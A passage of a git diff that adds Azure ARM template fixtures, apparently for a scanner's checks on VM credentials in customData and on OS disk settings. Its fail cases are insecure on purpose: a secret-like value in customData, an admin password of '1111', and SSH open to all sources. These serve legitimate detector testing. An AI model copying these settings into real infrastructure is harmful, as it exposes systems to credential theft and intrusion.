+            "defaultValue": "Enabled"
+        },
+        "autoIoScaling": {
+            "type": "string",
+            "defaultValue": "Disabled"
+        },
+        "identityData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "dataEncryptionData": {
+            "type": "object",
+            "defaultValue": {
+                "type": "AzureKeyVault",
+                "primaryUserAssignedIdentityId": "/subscriptions/037ce662-dfc1-4b8b-a8a7-6c414b540ed6/resourceGroups/test/providers/Microsoft.ManagedIdentity/userAssignedIdentities/pike",
+                "primaryKeyURI": "https://pike3.vault.azure.net/keys/pike/ae9a3b26e89445c49fe2b92091017ba2"
+            }
+        },
+        "serverParameters": {
+            "type": "array",
+            "defaultValue": []
+        },
+        "aadEnabled": {
+            "type": "bool",
+            "defaultValue": false
+        },
+        "aadData": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "guid": {
+            "type": "string",
+            "defaultValue": "[newGuid()]"
+        },
+        "network": {
+            "type": "object",
+            "defaultValue": {}
+        },
+        "firewallRulesAPIVersion": {
+            "type": "string",
+            "defaultValue": "2022-01-01"
+        }
+    },
+    "variables": {
+        "api": "[parameters('apiVersion')]",
+        "firewallRules": "[parameters('firewallRules').rules]",
+        "serverParameters": "[parameters('serverParameters')]"
+    },
+    "resources": [
+        {
+          "type": "Microsoft.DBforMySQL/servers",
+          "apiVersion": "2017-12-01",
+          "name": "pass",
+          "location": "string",
+          "tags": {
+            "tagName1": "tagValue1",
+            "tagName2": "tagValue2"
+          },
+            "{customized property}": "string",
+          "sku": {
+            "capacity": "int",
+            "family": "string",
+            "name": "string",
+            "size": "string",
+            "tier": "string"
+          },
+          "identity": {
+            "type": "SystemAssigned"
+          },
+          "properties": {
+            "infrastructureEncryption": "string",
+            "minimalTlsVersion": "string",
+            "publicNetworkAccess": "disabled",
+            "sslEnforcement": "string",
+            "storageProfile": {
+              "backupRetentionDays": "int",
+              "geoRedundantBackup": "string",
+              "storageAutogrow": "string",
+              "storageMB": "int"
+            },
+            "version": "string",
+            "createMode": "string"
+          }
+                },
+        {
+            "condition": "[greater(length(variables('firewallRules')), 0)]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('firewallRules-', parameters('guid'), '-', copyIndex())]",
+            "copy": {
+                "count": "[if(greater(length(variables('firewallRules')), 0), length(variables('firewallRules')), 1)]",
+                "mode": "Serial",
+                "name": "firewallRulesIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/firewallRules",
+                            "name": "[concat(parameters('serverName'),'/',variables('firewallRules')[copyIndex()].name)]",
+                            "apiVersion": "[parameters('firewallRulesAPIVersion')]",
+                            "properties": {
+                                "StartIpAddress": "[variables('firewallRules')[copyIndex()].startIPAddress]",
+                                "EndIpAddress": "[variables('firewallRules')[copyIndex()].endIPAddress]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[parameters('aadEnabled')]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "name": "[concat('addAdmins-', parameters('guid'))]",
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]"
+            ],
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/administrators",
+                            "name": "[concat(parameters('serverName'),'/ActiveDirectory')]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "administratorType": "[parameters('aadData').administratorType]",
+                                "identityResourceId": "[parameters('aadData').identityResourceId]",
+                                "login": "[parameters('aadData').login]",
+                                "sid": "[parameters('aadData').sid]",
+                                "tenantId": "[parameters('aadData').tenantId]"
+                            }
+                        }
+                    ]
+                }
+            }
+        },
+        {
+            "condition": "[and(greater(length(variables('serverParameters')), 0), parameters('aadEnabled'))]",
+            "type": "Microsoft.Resources/deployments",
+            "apiVersion": "2019-08-01",
+            "copy": {
+                "count": "[if(greater(length(variables('serverParameters')), 0), length(variables('serverParameters')), 1)]",
+                "mode": "serial",
+                "name": "serverParametersIterator"
+            },
+            "dependsOn": [
+                "[concat('Microsoft.DBforMySQL/flexibleServers/', parameters('serverName'))]",
+                "[concat('Microsoft.Resources/deployments/addAdmins-', parameters('guid'))]"
+            ],
+            "name": "[concat('serverParameters-', copyIndex(), '-', parameters('guid'))]",
+            "properties": {
+                "mode": "Incremental",
+                "template": {
+                    "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#",
+                    "contentVersion": "1.0.0.0",
+                    "resources": [
+                        {
+                            "type": "Microsoft.DBforMySQL/flexibleServers/configurations",
+                            "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]",
+                            "apiVersion": "[variables('api')]",
+                            "properties": {
+                                "value": "[variables('serverParameters')[copyIndex()].value]",
+                                "source": "[variables('serverParameters')[copyIndex()].source]"
+                            }
+                        }
+                    ]
+                }
+            }
+        }
+    ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json b/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json
new file mode 100644
index 00000000000..84ae9a641b8
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json
@@ -0,0 +1,175 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.22.6.54827",
+      "templateHash": "1864719808904770163"
+    }
+  },
+  "parameters": {
+    "dnsLabelPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Unique DNS Name for the Public IP used to access the Virtual Machine."
+      }
+    },
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "User name for the Virtual Machine."
+      }
+    },
+    "customData": {
+      "type": "string",
+      "defaultValue": "echo customData",
+      "metadata": {
+        "description": "String passed down to the Virtual Machine."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2_v3",
+      "metadata": {
+        "description": "VM size"
+      }
+    },
+    "ubuntuOSVersion": {
+      "type": "string",
+      "defaultValue": "18.04-LTS",
+      "allowedValues": [
+        "14.04-LTS",
+        "16.04-LTS",
+        "18.04-LTS",
+        "20.04-LTS"
+      ],
+      "metadata": {
+        "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 14.04-LTS,16.04-LTS,18.04-LTS,20.04-LTS."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "authenticationType": {
+      "type": "string",
+      "defaultValue": "sshPublicKey",
+      "allowedValues": [
+        "sshPublicKey",
+        "password"
+      ],
+      "metadata": {
+        "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended."
+      }
+    },
+    "adminPasswordOrKey": {
+      "type": "securestring",
+      "metadata": {
+        "description": "SSH Key or password for the Virtual Machine. SSH key is recommended."
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[format('{0}sacustmdata', uniqueString(resourceGroup().id))]",
+    "imagePublisher": "Canonical",
+    "imageOffer": "UbuntuServer",
+    "nicName": "networkInterface1",
+    "vmName": "vm1",
+    "virtualNetworkName": "virtualNetwork1",
+    "publicIPAddressName": "publicIp1",
+    "addressPrefix": "10.0.0.0/16",
+    "subnet1Name": "Subnet-1",
+    "subnet1Prefix": "10.0.0.0/24",
+    "publicIPAddressType": "Dynamic",
+    "storageAccountType": "Standard_LRS",
+    "linuxConfiguration": {
+      "disablePasswordAuthentication": true,
+      "ssh": {
+        "publicKeys": [
+          {
+            "path": "[format('/home/{0}/.ssh/authorized_keys', parameters('adminUsername'))]",
+            "keyData": "[parameters('adminPasswordOrKey')]"
+          }
+        ]
+      }
+    },
+    "networkSecurityGroupName": "default-NSG"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/networkSecurityGroups",
+      "apiVersion": "2023-05-01",
+      "name": "[variables('networkSecurityGroupName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "securityRules": [
+          {
+            "name": "default-allow-22",
+            "properties": {
+              "priority": 1000,
+              "access": "Allow",
+              "direction": "Inbound",
+              "destinationPortRange": "22",
+              "protocol": "Tcp",
+              "sourceAddressPrefix": "*",
+              "sourcePortRange": "*",
+              "destinationAddressPrefix": "*"
+            }
+          }
+        ]
+      }
+    },
+
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2023-07-01",
+      "name": "fail-secret",
+      "location": "[parameters('location')]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "osProfile": {
+          "computerName": "[variables('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "adminPassword": "[parameters('adminPasswordOrKey')]",
+          "customData": "<<EOF\n0000-0000-0000-0000-000000000000\nEOF",
+          "linuxConfiguration": "[if(equals(parameters('authenticationType'), 'password'), null(), variables('linuxConfiguration'))]"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "[variables('imagePublisher')]",
+            "offer": "[variables('imageOffer')]",
+            "sku": "[parameters('ubuntuOSVersion')]",
+            "version": "latest"
+          },
+          "osDisk": {
+            "createOption": "FromImage"
+          }
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
+            }
+          ]
+        },
+        "diagnosticsProfile": {
+          "bootDiagnostics": {
+            "enabled": true,
+            "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName')), '2023-01-01').primaryEndpoints.blob]"
+          }
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]",
+        "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/pass-empty-os-profile.json b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-empty-os-profile.json
new file mode 100644
index 00000000000..c8f50faf400
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-empty-os-profile.json
@@ -0,0 +1,134 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "adminUsername": {
+            "type": "string",
+            "minLength": 1,
+            "metadata": {
+                "description": "User name for the VM."
+            }
+        },
+        "_artifactsLocation": {
+            "type": "string",
+            "metadata": {
+                "description": "The base URI where artifacts required by this template are located. When the template is deployed using the accompanying scripts, a private location in the subscription will be used and this value will be automatically generated."
+            },
+            "defaultValue": "[deployment().properties.templateLink.uri]"
+        },
+        "_artifactsLocationSasToken": {
+            "type": "securestring",
+            "metadata": {
+                "description": "The sasToken required to access baseURL.  When the template is deployed using the accompanying scripts, a sasToken will be automatically generated."
+            },
+            "defaultValue": ""
+        },
+        "location": {
+            "type": "string",
+            "defaultValue": "[resourceGroup().location]",
+            "metadata": {
+                "description": "Location for all resources."
+            }
+        },
+        "authenticationType": {
+            "type": "string",
+            "defaultValue": "sshPublicKey",
+            "allowedValues": [
+                "sshPublicKey",
+                "password"
+            ],
+            "metadata": {
+                "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended."
+            }
+        },
+        "adminPasswordOrKey": {
+            "type": "securestring",
+            "metadata": {
+                "description": "SSH Key or password for the Virtual Machine. SSH key is recommended."
+            }
+        }
+    },
+    "variables": {
+        "vmName": "myVM",
+        "nicName": "[concat(variables('vmName'), '-nic')]",
+        "virtualNetworkName": "vnet-myVnet",
+        "subnetName": "default",
+        "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+        "updateip_templateUri": "[uri(parameters('_artifactsLocation'), concat('nested/update-nic.json', parameters('_artifactsLocationSasToken')))]",
+        "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+                "publicKeys": [
+                    {
+                        "path": "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]",
+                        "keyData": "[parameters('adminPasswordOrKey')]"
+                    }
+                ]
+            }
+        },
+        "networkSecurityGroupName": "default-NSG"
+    },
+    "resources": [
+        {
+            "comments": "Default Network Security Group for template",
+            "type": "Microsoft.Network/networkSecurityGroups",
+            "apiVersion": "2020-05-01",
+            "name": "[variables('networkSecurityGroupName')]",
+            "location": "[parameters('location')]",
+            "properties": {
+                "securityRules": [
+                    {
+                        "name": "default-allow-22",
+                        "properties": {
+                            "priority": 1000,
+                            "access": "Allow",
+                            "direction": "Inbound",
+                            "destinationPortRange": "22",
+                            "protocol": "TCP",
+                            "sourceAddressPrefix": "*",
+                            "sourcePortRange": "*",
+                            "destinationAddressPrefix": "*"
+                        }
+                    }
+                ]
+            }
+        },
+        {
+            "apiVersion": "2019-12-01",
+            "type": "Microsoft.Compute/virtualMachines",
+            "name": "pass-empty-os-profile",
+            "location": "[parameters('location')]",
+            "dependsOn": [
+                "updateIp"
+            ],
+            "properties": {
+                "hardwareProfile": {
+                    "vmSize": "[parameters('vmSize')]"
+                },
+                "osProfile": {
+                },
+                "storageProfile": {
+                    "imageReference": {
+                        "publisher": "Canonical",
+                        "offer": "UbuntuServer",
+                        "sku": "18.04-LTS",
+                        "version": "latest"
+                    }
+                },
+                "networkProfile": {
+                    "networkInterfaces": [
+                        {
+                            "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
+                        }
+                    ]
+                }
+            }
+        }
+    ],
+    "outputs": {
+        "privateIp": {
+            "type": "string",
+            "value": "[reference(variables('nicName')).ipConfigurations[0].properties.privateIPAddress]"
+        }
+    }
+}
diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-custom-date.json b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-custom-date.json
new file mode 100644
index 00000000000..96b87d9550c
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-custom-date.json
@@ -0,0 +1,138 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "adminUsername": {
+            "type": "string",
+            "minLength": 1,
+            "metadata": {
+                "description": "User name for the VM."
+            }
+        },
+        "_artifactsLocation": {
+            "type": "string",
+            "metadata": {
+                "description": "The base URI where artifacts required by this template are located. When the template is deployed using the accompanying scripts, a private location in the subscription will be used and this value will be automatically generated."
+            },
+            "defaultValue": "[deployment().properties.templateLink.uri]"
+        },
+        "_artifactsLocationSasToken": {
+            "type": "securestring",
+            "metadata": {
+                "description": "The sasToken required to access baseURL.  When the template is deployed using the accompanying scripts, a sasToken will be automatically generated."
+            },
+            "defaultValue": ""
+        },
+        "location": {
+            "type": "string",
+            "defaultValue": "[resourceGroup().location]",
+            "metadata": {
+                "description": "Location for all resources."
+            }
+        },
+        "authenticationType": {
+            "type": "string",
+            "defaultValue": "sshPublicKey",
+            "allowedValues": [
+                "sshPublicKey",
+                "password"
+            ],
+            "metadata": {
+                "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended."
+            }
+        },
+        "adminPasswordOrKey": {
+            "type": "securestring",
+            "metadata": {
+                "description": "SSH Key or password for the Virtual Machine. SSH key is recommended."
+            }
+        }
+    },
+    "variables": {
+        "vmName": "myVM",
+        "nicName": "[concat(variables('vmName'), '-nic')]",
+        "virtualNetworkName": "vnet-myVnet",
+        "subnetName": "default",
+        "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+        "updateip_templateUri": "[uri(parameters('_artifactsLocation'), concat('nested/update-nic.json', parameters('_artifactsLocationSasToken')))]",
+        "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+                "publicKeys": [
+                    {
+                        "path": "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]",
+                        "keyData": "[parameters('adminPasswordOrKey')]"
+                    }
+                ]
+            }
+        },
+        "networkSecurityGroupName": "default-NSG"
+    },
+    "resources": [
+        {
+            "comments": "Default Network Security Group for template",
+            "type": "Microsoft.Network/networkSecurityGroups",
+            "apiVersion": "2020-05-01",
+            "name": "[variables('networkSecurityGroupName')]",
+            "location": "[parameters('location')]",
+            "properties": {
+                "securityRules": [
+                    {
+                        "name": "default-allow-22",
+                        "properties": {
+                            "priority": 1000,
+                            "access": "Allow",
+                            "direction": "Inbound",
+                            "destinationPortRange": "22",
+                            "protocol": "TCP",
+                            "sourceAddressPrefix": "*",
+                            "sourcePortRange": "*",
+                            "destinationAddressPrefix": "*"
+                        }
+                    }
+                ]
+            }
+        },
+        {
+            "apiVersion": "2019-12-01",
+            "type": "Microsoft.Compute/virtualMachines",
+            "name": "pass-no-custom-date",
+            "location": "[parameters('location')]",
+            "dependsOn": [
+                "updateIp"
+            ],
+            "properties": {
+                "hardwareProfile": {
+                    "vmSize": "[parameters('vmSize')]"
+                },
+                "osProfile": {
+                    "computerName": "[variables('vmName')]",
+                    "adminUsername": "[parameters('adminUsername')]",
+                    "adminPassword": "[parameters('adminPasswordOrKey')]",
+                    "linuxConfiguration": "[if(equals(parameters('authenticationType'), 'password'), json('null'), variables('linuxConfiguration'))]"
+                },
+                "storageProfile": {
+                    "imageReference": {
+                        "publisher": "Canonical",
+                        "offer": "UbuntuServer",
+                        "sku": "18.04-LTS",
+                        "version": "latest"
+                    }
+                },
+                "networkProfile": {
+                    "networkInterfaces": [
+                        {
+                            "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
+                        }
+                    ]
+                }
+            }
+        }
+    ],
+    "outputs": {
+        "privateIp": {
+            "type": "string",
+            "value": "[reference(variables('nicName')).ipConfigurations[0].properties.privateIPAddress]"
+        }
+    }
+}
diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-os-profile.json b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-os-profile.json
new file mode 100644
index 00000000000..680eb99899b
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-os-profile.json
@@ -0,0 +1,132 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {
+        "adminUsername": {
+            "type": "string",
+            "minLength": 1,
+            "metadata": {
+                "description": "User name for the VM."
+            }
+        },
+        "_artifactsLocation": {
+            "type": "string",
+            "metadata": {
+                "description": "The base URI where artifacts required by this template are located. When the template is deployed using the accompanying scripts, a private location in the subscription will be used and this value will be automatically generated."
+            },
+            "defaultValue": "[deployment().properties.templateLink.uri]"
+        },
+        "_artifactsLocationSasToken": {
+            "type": "securestring",
+            "metadata": {
+                "description": "The sasToken required to access baseURL.  When the template is deployed using the accompanying scripts, a sasToken will be automatically generated."
+            },
+            "defaultValue": ""
+        },
+        "location": {
+            "type": "string",
+            "defaultValue": "[resourceGroup().location]",
+            "metadata": {
+                "description": "Location for all resources."
+            }
+        },
+        "authenticationType": {
+            "type": "string",
+            "defaultValue": "sshPublicKey",
+            "allowedValues": [
+                "sshPublicKey",
+                "password"
+            ],
+            "metadata": {
+                "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended."
+            }
+        },
+        "adminPasswordOrKey": {
+            "type": "securestring",
+            "metadata": {
+                "description": "SSH Key or password for the Virtual Machine. SSH key is recommended."
+            }
+        }
+    },
+    "variables": {
+        "vmName": "myVM",
+        "nicName": "[concat(variables('vmName'), '-nic')]",
+        "virtualNetworkName": "vnet-myVnet",
+        "subnetName": "default",
+        "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+        "updateip_templateUri": "[uri(parameters('_artifactsLocation'), concat('nested/update-nic.json', parameters('_artifactsLocationSasToken')))]",
+        "linuxConfiguration": {
+            "disablePasswordAuthentication": true,
+            "ssh": {
+                "publicKeys": [
+                    {
+                        "path": "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]",
+                        "keyData": "[parameters('adminPasswordOrKey')]"
+                    }
+                ]
+            }
+        },
+        "networkSecurityGroupName": "default-NSG"
+    },
+    "resources": [
+        {
+            "comments": "Default Network Security Group for template",
+            "type": "Microsoft.Network/networkSecurityGroups",
+            "apiVersion": "2020-05-01",
+            "name": "[variables('networkSecurityGroupName')]",
+            "location": "[parameters('location')]",
+            "properties": {
+                "securityRules": [
+                    {
+                        "name": "default-allow-22",
+                        "properties": {
+                            "priority": 1000,
+                            "access": "Allow",
+                            "direction": "Inbound",
+                            "destinationPortRange": "22",
+                            "protocol": "TCP",
+                            "sourceAddressPrefix": "*",
+                            "sourcePortRange": "*",
+                            "destinationAddressPrefix": "*"
+                        }
+                    }
+                ]
+            }
+        },
+        {
+            "apiVersion": "2019-12-01",
+            "type": "Microsoft.Compute/virtualMachines",
+            "name": "pass-no-os-profile",
+            "location": "[parameters('location')]",
+            "dependsOn": [
+                "updateIp"
+            ],
+            "properties": {
+                "hardwareProfile": {
+                    "vmSize": "[parameters('vmSize')]"
+                },
+                "storageProfile": {
+                    "imageReference": {
+                        "publisher": "Canonical",
+                        "offer": "UbuntuServer",
+                        "sku": "18.04-LTS",
+                        "version": "latest"
+                    }
+                },
+                "networkProfile": {
+                    "networkInterfaces": [
+                        {
+                            "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
+                        }
+                    ]
+                }
+            }
+        }
+    ],
+    "outputs": {
+        "privateIp": {
+            "type": "string",
+            "value": "[reference(variables('nicName')).ipConfigurations[0].properties.privateIPAddress]"
+        }
+    }
+}
diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-secret.json b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-secret.json
new file mode 100644
index 00000000000..a388d916f0f
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMCredsInCustomData/pass-no-secret.json
@@ -0,0 +1,175 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.22.6.54827",
+      "templateHash": "1864719808904770163"
+    }
+  },
+  "parameters": {
+    "dnsLabelPrefix": {
+      "type": "string",
+      "metadata": {
+        "description": "Unique DNS Name for the Public IP used to access the Virtual Machine."
+      }
+    },
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "User name for the Virtual Machine."
+      }
+    },
+    "customData": {
+      "type": "string",
+      "defaultValue": "echo customData",
+      "metadata": {
+        "description": "String passed down to the Virtual Machine."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_D2_v3",
+      "metadata": {
+        "description": "VM size"
+      }
+    },
+    "ubuntuOSVersion": {
+      "type": "string",
+      "defaultValue": "18.04-LTS",
+      "allowedValues": [
+        "14.04-LTS",
+        "16.04-LTS",
+        "18.04-LTS",
+        "20.04-LTS"
+      ],
+      "metadata": {
+        "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 14.04-LTS,16.04-LTS,18.04-LTS,20.04-LTS."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "authenticationType": {
+      "type": "string",
+      "defaultValue": "sshPublicKey",
+      "allowedValues": [
+        "sshPublicKey",
+        "password"
+      ],
+      "metadata": {
+        "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended."
+      }
+    },
+    "adminPasswordOrKey": {
+      "type": "securestring",
+      "metadata": {
+        "description": "SSH Key or password for the Virtual Machine. SSH key is recommended."
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[format('{0}sacustmdata', uniqueString(resourceGroup().id))]",
+    "imagePublisher": "Canonical",
+    "imageOffer": "UbuntuServer",
+    "nicName": "networkInterface1",
+    "vmName": "vm1",
+    "virtualNetworkName": "virtualNetwork1",
+    "publicIPAddressName": "publicIp1",
+    "addressPrefix": "10.0.0.0/16",
+    "subnet1Name": "Subnet-1",
+    "subnet1Prefix": "10.0.0.0/24",
+    "publicIPAddressType": "Dynamic",
+    "storageAccountType": "Standard_LRS",
+    "linuxConfiguration": {
+      "disablePasswordAuthentication": true,
+      "ssh": {
+        "publicKeys": [
+          {
+            "path": "[format('/home/{0}/.ssh/authorized_keys', parameters('adminUsername'))]",
+            "keyData": "[parameters('adminPasswordOrKey')]"
+          }
+        ]
+      }
+    },
+    "networkSecurityGroupName": "default-NSG"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/networkSecurityGroups",
+      "apiVersion": "2023-05-01",
+      "name": "[variables('networkSecurityGroupName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "securityRules": [
+          {
+            "name": "default-allow-22",
+            "properties": {
+              "priority": 1000,
+              "access": "Allow",
+              "direction": "Inbound",
+              "destinationPortRange": "22",
+              "protocol": "Tcp",
+              "sourceAddressPrefix": "*",
+              "sourcePortRange": "*",
+              "destinationAddressPrefix": "*"
+            }
+          }
+        ]
+      }
+    },
+
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2023-07-01",
+      "name": "pass-no-secret",
+      "location": "[parameters('location')]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "osProfile": {
+          "computerName": "[variables('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "adminPassword": "[parameters('adminPasswordOrKey')]",
+          "customData": "<<EOF\nexample\nEOF",
+          "linuxConfiguration": "[if(equals(parameters('authenticationType'), 'password'), null(), variables('linuxConfiguration'))]"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "[variables('imagePublisher')]",
+            "offer": "[variables('imageOffer')]",
+            "sku": "[parameters('ubuntuOSVersion')]",
+            "version": "latest"
+          },
+          "osDisk": {
+            "createOption": "FromImage"
+          }
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]"
+            }
+          ]
+        },
+        "diagnosticsProfile": {
+          "bootDiagnostics": {
+            "enabled": true,
+            "storageUri": "[reference(resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName')), '2023-01-01').primaryEndpoints.blob]"
+          }
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]",
+        "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_VMStorageOsDisk/fail.json b/tests/arm/checks/resource/example_VMStorageOsDisk/fail.json
new file mode 100644
index 00000000000..dc778757dfa
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMStorageOsDisk/fail.json
@@ -0,0 +1,57 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2021-07-01",
+      "name": "fail-linux",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "Standard_DS1_v2"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "Canonical",
+            "offer": "UbuntuServer",
+            "sku": "16.04-LTS",
+            "version": "latest"
+          },
+          "osDisk": {
+            "name": "myosdisk3",
+            "caching": "ReadWrite",
+            "createOption": "FromImage",
+            "managedDisk": {
+              "storageAccountType": "Standard_LRS"
+            },
+            "vhd": {
+              "uri": "someURI"
+            }
+          }
+        },
+        "osProfile": {
+          "computerName": "hostname",
+          "adminUsername": "testadmin",
+          "adminPassword": "1111"
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', 'main')]"
+            }
+          ]
+        }
+      },
+      "tags": {
+        "environment": "staging"
+      }
+    }
+  ],
+  "parameters": {
+    "prefix": {
+      "type": "string",
+      "defaultValue": "myprefix"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_VMStorageOsDisk/fail2.json b/tests/arm/checks/resource/example_VMStorageOsDisk/fail2.json
new file mode 100644
index 00000000000..bce2a3dd8e7
--- /dev/null
+++ b/tests/arm/checks/resource/example_VMStorageOsDisk/fail2.json
@@ -0,0 +1,59 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2021-07-01",
+      "name": "fail-windows",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "Standard_DS1_v2"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "MicrosoftWindowsServer",
+            "offer": "WindowsServer",
+            "sku": "2019-Datacenter",
+            "version": "latest"
+          },
+          "dataDisks": [
+            {
+              "name": "mydatadisk1",
+              "caching": "ReadWrite",
